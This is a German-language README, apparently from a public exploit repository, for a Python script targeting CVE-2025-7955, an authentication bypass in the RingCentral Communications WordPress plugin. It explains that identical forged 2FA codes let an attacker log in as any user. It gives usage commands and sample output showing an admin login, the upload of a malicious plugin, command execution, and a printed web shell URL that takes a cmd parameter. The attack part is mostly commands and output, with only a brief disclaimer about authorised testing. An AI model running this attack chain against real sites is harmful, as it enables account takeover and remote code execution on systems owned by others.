
RingCentral Communications 1.5 - 1.6.8 - Fehlende serverseitige Verifizierung zur Authentifizierungsumgehung über die Funktion ringcentral_admin_login_2fa_verify
RingCentral Communications 1.5 - 1.6.8 - Fehlende serverseitige Verifizierung führt zu Authentication-Bypass über die Funktion ringcentral_admin_login_2fa_verify
CVE: CVE-2025-7955
Betroffenes Plugin: RingCentral Communications (WordPress)
Betroffene Versionen: 1.5 – 1.6.8
CVSS-Score: 9.8 (Kritisch)
Typ: Authentication-Bypass (fehlende serverseitige Verifizierung)
Das RingCentral Communications Plugin für WordPress ist aufgrund einer fehlerhaften Validierung innerhalb der Funktion
ringcentral_admin_login_2fa_verify()anfällig für einen Authentication-Bypass. Die Versionen 1.5 bis 1.6.8 erlauben nicht authentifizierten Angreifern, sich als beliebiger Benutzer anzumelden, indem sie einfach identische gefälschte Codes übermitteln.
Dieser Exploit automatisiert die gesamte Angriffskette für CVE-2025-7955. Er ist darauf ausgelegt:
/wp-json/wp/v2/users/ID) zu enumerieren.whoami über die Shell ausführt und die Ausgabe ausgibt.Bereiten Sie Ihr bösartiges Plugin vor
Stellen Sie sicher, dass sich Ihre bösartige Plugin-ZIP-Datei (Standard: Nxploit.zip) im selben Verzeichnis wie das Skript befindet.
Exploit ausführen:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (erforderlich) URL der Ziel-WordPress-Site-user, --username : (optional) Benutzername, mit dem angemeldet werden soll (wird bei Weglassen automatisch ermittelt)-id, --id_admin : (Standard: 1) Benutzer-ID (Admin ist normalerweise ID 1)-z, --zip : (Standard: Nxploit.zip) Pfad zur bösartigen Plugin-ZIPBeispiel:
python3 CVE-2025-7955.py -u http://target/wordpress
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt.
Die unbefugte Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal und unethisch.
Der Autor übernimmt keinerlei Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.
Von: Khaled Alenazi (Nxploited)
oder Benutzername/ID angeben:
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1